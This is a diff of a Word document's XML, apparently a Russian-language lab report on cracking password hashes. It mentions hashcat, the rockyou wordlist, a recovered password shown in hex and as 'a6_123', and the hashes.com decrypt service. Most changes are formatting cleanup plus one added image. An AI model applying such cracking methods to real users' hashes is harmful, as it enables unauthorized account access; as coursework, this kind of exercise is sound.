@@ -8143,14 +6448,12 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>hashcat</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8233,9 +6536,6 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="708"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -8335,6 +6635,48 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F9B2F8B" wp14:editId="7A2137FD">
+            <wp:extent cx="5477244" cy="2964180"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="7620"/>
+            <wp:docPr id="152184222" name="Рисунок 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="152184222" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5489470" cy="2970796"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -8363,14 +6705,12 @@
         <w:tab/>
         <w:t xml:space="preserve">Файл </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>rockyou</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -8398,66 +6738,57 @@
       <w:r>
         <w:t xml:space="preserve">из </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Github</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+    </w:p>
+    <w:p>
       <w:r>
         <w:tab/>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve">пароль: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>61365f313233</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">   (</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>a</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>6_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">123  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        <w:t>6_123</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+      <w:r>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve">на   </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>https</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>://</w:t>
       </w:r>
       <w:r>
@@ -8467,9 +6798,6 @@
         <w:t>hashes</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>.</w:t>
       </w:r>
       <w:r>
@@ -8479,9 +6807,6 @@
         <w:t>com</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>/</w:t>
       </w:r>
       <w:r>
@@ -8491,9 +6816,6 @@
         <w:t>en</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>/</w:t>
       </w:r>
       <w:r>
@@ -8503,9 +6825,6 @@
         <w:t>decrypt</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>/</w:t>
       </w:r>
       <w:r>
@@ -8515,19 +6834,10 @@
         <w:t>hash</w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>)</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="708" w:footer="708" w:gutter="0"/>
